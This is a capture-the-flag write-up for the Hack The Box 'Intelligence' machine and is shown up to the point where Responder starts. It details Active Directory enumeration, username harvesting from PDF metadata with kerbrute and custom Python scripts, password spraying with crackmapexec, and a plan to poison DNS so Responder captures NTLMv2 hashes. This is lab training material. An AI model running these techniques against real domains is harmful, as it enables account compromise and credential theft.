 ========================================= 
[+] Server intelligence.htb allows sessions using username '', password ''
[+] Got domain/workgroup name: 

 =============================================== 
|    Getting domain SID for intelligence.htb    |
 =============================================== 
Domain Name: intelligence
Domain Sid: S-1-5-21-4210132550-3389855604-3437519686
[+] Host is part of a domain (not a workgroup)

 ========================================== 
|    OS information on intelligence.htb    |
 ========================================== 
[+] Got OS info for intelligence.htb from smbclient: 
[+] Got OS info for intelligence.htb from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 ================================= 
|    Users on intelligence.htb    |
 ================================= 
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

 ============================================= 
|    Share Enumeration on intelligence.htb    |
 ============================================= 

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on intelligence.htb

 ======================================================== 
|    Password Policy Information for intelligence.htb    |
 ======================================================== 
[E] Unexpected error from polenum:


[+] Attaching to intelligence.htb using a NULL share

[+] Trying protocol 139/SMB...

	[!] Protocol failed: Cannot request session (Called Name:INTELLIGENCE.HT)

[+] Trying protocol 445/SMB...

	[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.


[E] Failed to get password policy with rpcclient


 ================================== 
|    Groups on intelligence.htb    |
 ================================== 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 =========================================================================== 
|    Users on intelligence.htb via RID cycling (RIDS: 500-550,1000-1050)    |
 =========================================================================== 
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.

 ================================================= 
|    Getting printer info for intelligence.htb    |
 ================================================= 
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED


enum4linux completed

Nothing much from here, so let's try anonymous login.

Anonymous Login

root@Raj:~/HTB/Intelligence$ smbclient -L //intelligence.htb
Enter WORKGROUP\root's password: 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available

Anonymous login works, but no shares are listed, so let’s enumerate further.

LDAP

Let’s do an LDAP search to get the naming contexts of the AD (Active Directory).

root@Raj:~/HTB/Intelligence$ ldapsearch -x -h intelligence.htb -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=intelligence,DC=htb
namingcontexts: CN=Configuration,DC=intelligence,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=intelligence,DC=htb
namingcontexts: DC=DomainDnsZones,DC=intelligence,DC=htb
namingcontexts: DC=ForestDnsZones,DC=intelligence,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

Nothing unusual here, just the standard naming contexts for intelligence.htb, so let’s move on.

Web

Looking through the web page we can see two PDFs, so maybe we can get some usernames from their exif data. Let’s fetch both PDFs.

root@Raj:~/HTB/Intelligence$ wget http://intelligence.htb/documents/2020-01-01-upload.pdf
Resolving intelligence.htb (intelligence.htb)... 10.129.80.199
Connecting to intelligence.htb (intelligence.htb)|10.129.80.199|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 26835 (26K) [application/pdf]
Saving to: ‘2020-01-01-upload.pdf’

2020-01-01-upload.pdf    100%[===================================================================================>]  26.21K  79.8KB/s    in 0.3s

(79.8 KB/s) - ‘2020-01-01-upload.pdf’ saved [26835/26835]

root@Raj:~/HTB/Intelligence$ wget http://intelligence.htb/documents/2020-12-15-upload.pdf
Resolving intelligence.htb (intelligence.htb)... 10.129.80.199
Connecting to intelligence.htb (intelligence.htb)|10.129.80.199|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27242 (27K) [application/pdf]
Saving to: ‘2020-12-15-upload.pdf’

2020-12-15-upload.pdf    100%[===================================================================================>]  26.60K  90.0KB/s    in 0.3s

(90.0 KB/s) - ‘2020-12-15-upload.pdf’ saved [27242/27242]

Now let’s look at the exif data of those PDFs.

root@Raj:~/HTB/Intelligence$ exiftool 2020-01-01-upload.pdf 
ExifTool Version Number         : 12.09
File Name                       : 2020-01-01-upload.pdf
Directory                       : .
File Size                       : 26 kB
File Modification Date/Time     : 2021:04:01 18:00:00+01:00
File Access Date/Time           : 2021:07:05 03:32:22+01:00
File Inode Change Date/Time     : 2021:07:05 03:32:22+01:00
File Permissions                : rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.5
Linearized                      : No
Page Count                      : 1
Creator                         : William.Lee
root@Raj:~/HTB/Intelligence$ exiftool 2020-12-15-upload.pdf 
ExifTool Version Number         : 12.09
File Name                       : 2020-12-15-upload.pdf
Directory                       : .
File Size                       : 27 kB
File Modification Date/Time     : 2021:04:01 18:00:00+01:00
File Access Date/Time           : 2021:07:05 03:32:27+01:00
File Inode Change Date/Time     : 2021:07:05 03:32:27+01:00
File Permissions                : rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.5
Linearized                      : No
Page Count                      : 1
Creator                         : Jose.Williams
root@Raj:~/HTB/Intelligence$

Looks like we have two usernames, Jose.Williams and William.Lee, so let’s create a wordlist with different combinations of their names and then brute-force it with kerbrute.

Kerberos

Thinking about the username formats an organisation might use, I came up with the wordlist below.

Administrator
Guest
William
Jose.Williams 
William.Lee
Jwilliams
JWilliams
WLee
Wlee
LWilliams
Lwilliams
WJose
Wjose
wJose
wjose
lWilliams
lwilliams
wlee
wLee
jWilliams
jwilliams

In this case you don’t need to create this wordlist, because the author name from the metadata is itself one of the usernames, but in a real-life scenario or a harder CTF you might need to build a wordlist like the one above. Let’s move on and try kerbrute against the AD.
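To build such a list systematically instead of by hand, here is an added example of my own (not the author’s script) that derives the usual corporate username formats from the two names found in the PDF metadata. It generalises the hand-written list above to any number of names and emits only lowercase forms, since AD compares sAMAccountName case-insensitively and the mixed-case entries above only cost extra requests; the exact set of formats is an assumption about what an organisation might use.

```python
#!/usr/bin/python3
# Added example: derive candidate AD usernames from "First Last" / "First.Last" names.
# The list of formats is an assumption, not something taken from the target.


def username_candidates(full_names):
    """Return an ordered, de-duplicated list of lowercase username candidates.

    sAMAccountName lookups in AD are case-insensitive, so case variants of the
    same string would only duplicate attempts and are deliberately not emitted.
    """
    seen = set()
    out = []
    for full in full_names:
        parts = full.replace(".", " ").split()
        if len(parts) < 2:
            continue
        first, last = parts[0].lower(), parts[-1].lower()
        f, l = first[0], last[0]
        forms = [
            f"{first}.{last}",   # first.last (the format seen in the PDF metadata)
            f"{first}{last}",    # firstlast
            f"{f}{last}",        # flast
            f"{first}{l}",       # firstl
            f"{f}.{last}",       # f.last
            f"{last}.{first}",   # last.first
            f"{last}{first}",    # lastfirst
            f"{last}{f}",        # lastf
            f"{l}{first}",       # lfirst
            first,               # bare first name
            last,                # bare last name
        ]
        for u in forms:
            if u not in seen:
                seen.add(u)
                out.append(u)
    return out


def write_wordlist(path, names, extra=("administrator", "guest")):
    """Write the candidates plus a few built-in account names to a file for kerbrute."""
    cands = list(extra) + username_candidates(names)
    with open(path, "w") as fh:
        fh.write("\n".join(cands) + "\n")
    return len(cands)


if __name__ == "__main__":
    # The two creators recovered from the PDF metadata above.
    n = write_wordlist("user.txt", ["William.Lee", "Jose.Williams"])
    print(f"wrote {n} candidate usernames to user.txt")
```

The resulting user.txt can be fed straight to kerbrute userenum as in the next step.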

root@Raj:~/HTB/Intelligence$ ~/Git/kerbrute/dist/kerbrute userenum --dc intelligence.htb -d intelligence.htb user.txt 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (1ad284a) - 07/05/21 - Ronnie Flathers @ropnop

2021/07/05 03:37:21 >  Using KDC(s):
2021/07/05 03:37:21 >   intelligence.htb:88

2021/07/05 03:37:22 >  [+] VALID USERNAME:       William.Lee@intelligence.htb
2021/07/05 03:37:22 >  [+] VALID USERNAME:       Administrator@intelligence.htb
2021/07/05 03:37:22 >  Done! Tested 21 usernames (2 valid) in 0.804 seconds

So now we have two users. Before brute-forcing the password let’s check for some low-hanging fruit like GetNPUsers. I got nothing from that, so I thought there could be something else and went back to the PDFs.

Web

I noticed that the PDFs are named with a date followed by upload, so I tried brute-forcing all dates to find out whether there are any more PDFs. The script below creates a pdf directory and downloads every PDF it finds into it.

#!/usr/bin/python3

import os
import requests

url = 'http://intelligence.htb/documents/'

# Create the output directory once, not on every hit.
os.makedirs('pdf', exist_ok=True)

for i in range(2020, 2022):
    for j in range(1, 13):
        for k in range(1, 32):  # include the 31st; impossible dates simply return 404
            date = f'{i}-{j:02}-{k:02}-upload.pdf'
            r = requests.get(url + date)
            if r.status_code == 200:
                print(date)
                # Save the body we already fetched instead of re-downloading it with wget.
                with open(f'pdf/{date}', 'wb') as fh:
                    fh.write(r.content)

As there were now quite a few PDF files, I wrote another Python script to extract the usernames from their metadata.

#!/usr/bin/python3

# Collect the Creator field of every downloaded PDF into users.txt.
# exiftool is called directly via subprocess; -s -s -s prints only the
# tag value, so no fragile parsing of ls / exiftool output is needed.
import os
import subprocess

files = sorted(os.listdir('pdf'))

with open('users.txt', 'w') as f:
    for name in files:
        out = subprocess.run(
            ['exiftool', '-s', '-s', '-s', '-Creator', f'pdf/{name}'],
            capture_output=True, text=True,
        ).stdout.strip()
        if out:
            f.write(out + '\n')
            print(out)

This creates users.txt for you. With users.txt in hand you can retry GetNPUsers.py, but it won’t help, so let’s dig further into the PDFs themselves. To search the PDF text for passwords I wrote this simple Python script.

#!/usr/bin/python3

from pdfminer.high_level import extract_text

files = ['2020-01-01-upload.pdf', '2020-01-02-upload.pdf', '2020-01-04-upload.pdf', '2020-01-10-upload.pdf', '2020-01-20-upload.pdf', '2020-01-22-upload.pdf', '2020-01-23-upload.pdf', '2020-01-25-upload.pdf', '2020-01-30-upload.pdf', '2020-02-11-upload.pdf', '2020-02-17-upload.pdf', '2020-02-23-upload.pdf', '2020-02-24-upload.pdf', '2020-02-28-upload.pdf', '2020-03-04-upload.pdf', '2020-03-05-upload.pdf', '2020-03-12-upload.pdf', '2020-03-13-upload.pdf', '2020-03-17-upload.pdf', '2020-03-21-upload.pdf', '2020-04-02-upload.pdf', '2020-04-04-upload.pdf', '2020-04-15-upload.pdf', '2020-04-23-upload.pdf', '2020-05-01-upload.pdf', '2020-05-03-upload.pdf', '2020-05-07-upload.pdf', '2020-05-11-upload.pdf', '2020-05-17-upload.pdf', '2020-05-20-upload.pdf', '2020-05-21-upload.pdf', '2020-05-24-upload.pdf', '2020-05-29-upload.pdf', '2020-06-02-upload.pdf', '2020-06-03-upload.pdf', '2020-06-04-upload.pdf', '2020-06-07-upload.pdf', '2020-06-08-upload.pdf', '2020-06-12-upload.pdf', '2020-06-14-upload.pdf', '2020-06-15-upload.pdf', '2020-06-21-upload.pdf', '2020-06-22-upload.pdf', '2020-06-25-upload.pdf', '2020-06-26-upload.pdf', '2020-06-28-upload.pdf', '2020-06-30-upload.pdf', '2020-07-02-upload.pdf', '2020-07-06-upload.pdf', '2020-07-08-upload.pdf', '2020-07-20-upload.pdf', '2020-07-24-upload.pdf', '2020-08-01-upload.pdf', '2020-08-03-upload.pdf', '2020-08-09-upload.pdf', '2020-08-19-upload.pdf', '2020-08-20-upload.pdf', '2020-09-02-upload.pdf', '2020-09-04-upload.pdf', '2020-09-05-upload.pdf', '2020-09-06-upload.pdf', '2020-09-11-upload.pdf', '2020-09-13-upload.pdf', '2020-09-16-upload.pdf', '2020-09-22-upload.pdf', '2020-09-27-upload.pdf', '2020-09-29-upload.pdf', '2020-09-30-upload.pdf', '2020-10-05-upload.pdf', '2020-10-19-upload.pdf', '2020-11-01-upload.pdf', '2020-11-03-upload.pdf', '2020-11-06-upload.pdf', '2020-11-10-upload.pdf', '2020-11-11-upload.pdf', '2020-11-13-upload.pdf', '2020-11-24-upload.pdf', '2020-11-30-upload.pdf']
#keywords = ['user','username','pass','password']
keywords = 'user'

for i in files:
	text = extract_text('pdf/'+i)
	if(keywords in text):
		print (i)
		print (text)

So this will give you the following output.

root@Raj:~/HTB/Intelligence$ chmod +x script.py
root@Raj:~/HTB/Intelligence$ ./script.py 
2020-06-04-upload.pdf
New Account Guide

Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876

After logging in please change your password as soon as possible.

So now we have a default password, so let’s spray it against our usernames. I tried kerbrute but it didn’t yield anything, then I tried crackmapexec.

Crackmapexec

root@Raj:~/HTB/Intelligence$ crackmapexec smb <MACHINE IP> -u users.txt -p NewIntelligenceCorpUser9876
SMB         10.129.80.199   445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB         10.129.80.199   445    DC               [-] intelligence.htb\User9876:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Scott.Scott:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Veronica.Patel:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Jennifer.Thomas:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Danny.Matthews:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Daniel.Shelton:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Daniel.Shelton:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Brian.Morris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Jennifer.Thomas:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Samuel.Richardson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Anita.Roberts:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Brian.Baker:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Kelly.Long:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Kaitlyn.Zimmerman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Jason.Patterson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Darryl.Harris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\David.Wilson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Scott.Scott:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Teresa.Williamson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Veronica.Patel:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Samuel.Richardson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Jessica.Moody:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.80.199   445    DC               [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876

Looks like we have the password for Tiffany.Molina.

smbmap

[\] Working on it...
[+] IP: intelligence.htb:445	Name: unknown                                           
[-] Working on it...
                                
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	READ ONLY	Remote IPC
	.\IPC$\*
	fr--r--r--                3 Sun Dec 31 23:58:45 1600	InitShutdown
	fr--r--r--                4 Sun Dec 31 23:58:45 1600	lsass
	fr--r--r--                3 Sun Dec 31 23:58:45 1600	ntsvcs
	fr--r--r--                3 Sun Dec 31 23:58:45 1600	scerpc
	fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-39c-0
	fr--r--r--                3 Sun Dec 31 23:58:45 1600	epmapper
	fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-1b8-0
	fr--r--r--                3 Sun Dec 31 23:58:45 1600	LSM_API_service
	fr--r--r--                3 Sun Dec 31 23:58:45 1600	eventlog
	fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-394-0
	fr--r--r--                3 Sun Dec 31 23:58:45 1600	atsvc
	fr--r--r--                4 Sun Dec 31 23:58:45 1600	wkssvc
	fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-258-0
	fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-4e8-0
	fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-258-1
	fr--r--r--                3 Sun Dec 31 23:58:45 1600	RpcProxy\49677
	fr--r--r--                3 Sun Dec 31 23:58:45 1600	01c597a227e270af
	fr--r--r--                3 Sun Dec 31 23:58:45 1600	RpcProxy\593
	fr--r--r--                5 Sun Dec 31 23:58:45 1600	srvsvc
	fr--r--r--                3 Sun Dec 31 23:58:45 1600	efsrpc
	fr--r--r--                3 Sun Dec 31 23:58:45 1600	netdfs
	fr--r--r--                1 Sun Dec 31 23:58:45 1600	vgauth-service
	fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-240-0
	fr--r--r--                3 Sun Dec 31 23:58:45 1600	W32TIME_ALT
	fr--r--r--                3 Sun Dec 31 23:58:45 1600	cert
	fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-9f0-0
	fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-a7c-0
	fr--r--r--                1 Sun Dec 31 23:58:45 1600	PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
	fr--r--r--                1 Sun Dec 31 23:58:45 1600	Winsock2\CatalogChangeListener-a50-0
	IT                                                	READ ONLY	
	.\IT\*
	dr--r--r--                0 Mon Apr 19 01:50:58 2021	.
	dr--r--r--                0 Mon Apr 19 01:50:58 2021	..
	fr--r--r--             1046 Mon Apr 19 01:50:58 2021	downdetector.ps1
	NETLOGON                                          	READ ONLY	Logon server share 
	.\NETLOGON\*
	dr--r--r--                0 Mon Apr 19 01:42:14 2021	.
	dr--r--r--                0 Mon Apr 19 01:42:14 2021	..
	SYSVOL                                            	READ ONLY	Logon server share 
	.\SYSVOL\*
	dr--r--r--                0 Mon Apr 19 01:42:14 2021	.
	dr--r--r--                0 Mon Apr 19 01:42:14 2021	..
	dr--r--r--                0 Mon Apr 19 01:42:14 2021	intelligence.htb
	Users                                             	READ ONLY	
	.\Users\*
	dw--w--w--                0 Mon Apr 19 02:20:26 2021	.
	dw--w--w--                0 Mon Apr 19 02:20:26 2021	..
	dr--r--r--                0 Mon Apr 19 01:18:39 2021	Administrator
	dr--r--r--                0 Mon Apr 19 04:16:30 2021	All Users
	dw--w--w--                0 Mon Apr 19 03:17:40 2021	Default
	dr--r--r--                0 Mon Apr 19 04:16:30 2021	Default User
	fr--r--r--              174 Mon Apr 19 04:15:17 2021	desktop.ini
	dw--w--w--                0 Mon Apr 19 01:18:39 2021	Public
	dr--r--r--                0 Mon Apr 19 02:20:26 2021	Ted.Graves
	dr--r--r--                0 Mon Apr 19 01:51:46 2021	Tiffany.Molina

We have read access to a few of the shares, so let’s try and access them.

User.txt

root@Raj:~/HTB/Intelligence$ smbclient //intelligence.htb/Users -U 'Tiffany.Molina'
Enter WORKGROUP\Tiffany.Molina's password: NewIntelligenceCorpUser9876
Try "help" to get a list of possible commands.
smb: \> cd Tiffany.Molina\Desktop\
smb: \Tiffany.Molina\Desktop\> get user.txt
getting file \Tiffany.Molina\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)

Now you have user.txt.

PrivESC

Enumeration

The share that looked interesting to me was IT, so let’s look into that.

root@Raj:~/HTB/Intelligence$ smbclient //intelligence.htb/IT -U 'Tiffany.Molina'
Enter WORKGROUP\Tiffany.Molina's password: NewIntelligenceCorpUser9876
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Apr 19 01:50:55 2021
  ..                                  D        0  Mon Apr 19 01:50:55 2021
  downdetector.ps1                    A     1046  Mon Apr 19 01:50:55 2021

		3770367 blocks of size 4096. 1454216 blocks available
smb: \> get downdetector.ps1
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \>

Looks like we have a PowerShell script, so let’s explore it.

# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
    try {
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        if($request.StatusCode -ne 200) {
            Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
        }
    } catch {}
}

Looks like we have a cron-job-style scheduled task running every five minutes: it pulls every DNS record in the AD-integrated zone whose name starts with web and makes an HTTP request to it with -UseDefaultCredentials, i.e. it authenticates as the account the task runs under (Ted.Graves, the script’s owner). The only check on the hostname is the web* filter, so that is easy to satisfy. By default any authenticated domain user can create new records in an AD-integrated DNS zone, so if we add a web* record pointing at our machine we can capture Ted.Graves’s NTLMv2 hash with Responder. The logic is simple: we add the DNS record, the script checks whether that host responds, and as soon as it does we see Ted’s hash in Responder.

root@Raj:~/HTB/Intelligence$ sudo python /usr/share/responder/Responder.py -I tun0 -A                                                                         
                                         __                                                                                                                           
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.                                                                                                              
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|                                                                                                              
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|                                                                                                                
                   |__|                                                                                                                                               
 
           NBT-NS, LLMNR & MDNS Responder 3.0.2.0                 
  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C 
/!\ Warning: files/AccessDenied.html: file not found
/!\ Warning: files/BindShell.exe: file not found                                                                                                                      
 
[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]
	
[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
	POP3 server                [ON] 
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

